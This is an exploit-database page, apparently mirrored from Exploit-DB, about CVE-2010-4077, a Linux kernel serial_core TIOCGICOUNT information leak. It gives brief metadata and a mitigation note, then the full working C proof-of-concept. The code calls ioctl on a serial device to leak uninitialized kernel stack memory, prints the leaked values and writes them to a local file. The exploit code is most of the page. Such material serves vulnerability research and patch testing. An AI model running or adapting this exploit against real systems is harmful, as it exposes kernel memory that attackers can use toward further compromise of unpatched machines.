header-logo
Suggest Exploit
vendor:
Linux
by:
prdelka
7.2
CVSS
HIGH
Information leak
200
CWE
Product Name: Linux
Affected Version From: 2.6.37-rc1
Affected Version To: 2.6.37-rc1
Patch Exists: YES
Related CWE: CVE-2010-4077
CPE: 2.6.37-rc1
Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-4077/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0958/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=59155https://www.infosecmatter.com/nessus-plugin-library/?id=52991https://www.infosecmatter.com/nessus-plugin-library/?id=55607https://www.infosecmatter.com/nessus-plugin-library/?id=51066https://www.infosecmatter.com/nessus-plugin-library/?id=50979https://www.infosecmatter.com/nessus-plugin-library/?id=53303https://www.infosecmatter.com/nessus-plugin-library/?id=55762https://www.infosecmatter.com/nessus-plugin-library/?id=56343https://www.infosecmatter.com/nessus-plugin-library/?id=56192https://www.infosecmatter.com/nessus-plugin-library/?id=56207
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak

This exploit is for CVE-2010-4077 which leaks kernel stack space back to userland due to uninitialized struct member 'reserved' in struct serial_icounter_struct copied to userland. It uses ioctl to trigger memory leak, dumps to file and displays to command line.

Mitigation:

Update the kernel to the latest version.
Source

Exploit-DB raw data:

/* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak
 * ================================================ 
 * Information leak exploit for CVE-2010-4077 which
 * leaks kernel stack space back to userland due to
 * uninitialized struct member "reserved" in struct
 * serial_icounter_struct copied to userland. uses 
 * ioctl to trigger memory leak, dumps to file and 
 * displays to command line.
 *
 * -- prdelka
 *
 */
#include <termios.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/serial.h>
#include <stdio.h>
#include <stdlib.h>	
#include <string.h>

int main(int argc, char* argv[]) {
    int fd, ret = 0, i;
    struct serial_icounter_struct buffer;
    printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");
    if(argc < 2){
	printf("[ You need to supply a device name e.g. /dev/ttyS0\n");
	exit(-1);
    };
    memset(&buffer,0,sizeof(buffer));
    if((fd = open(argv[1], O_RDONLY)) == -1){
	printf("[ Couldn't open %s\n",argv[1]);
	exit(-1);
    }
    if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){
	printf("[ Problem with ioctl() request\n");
	exit(-1);
    }
    close(fd); 
    for(i=0;i<=9;i++){
            printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);
    };
    if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){
	printf("[ Can't open file to write memory out\n");
	exit(-1);
    }
    for(i=0;i<=9;i++){
	    ret += write(fd,&buffer.reserved[i],sizeof(int));
    }
    close(fd);
    printf("[ Written %d leaked bytes to ./leak\n",ret);
    exit(0);
}

Navigation

Suggest Exploit

Services By CQR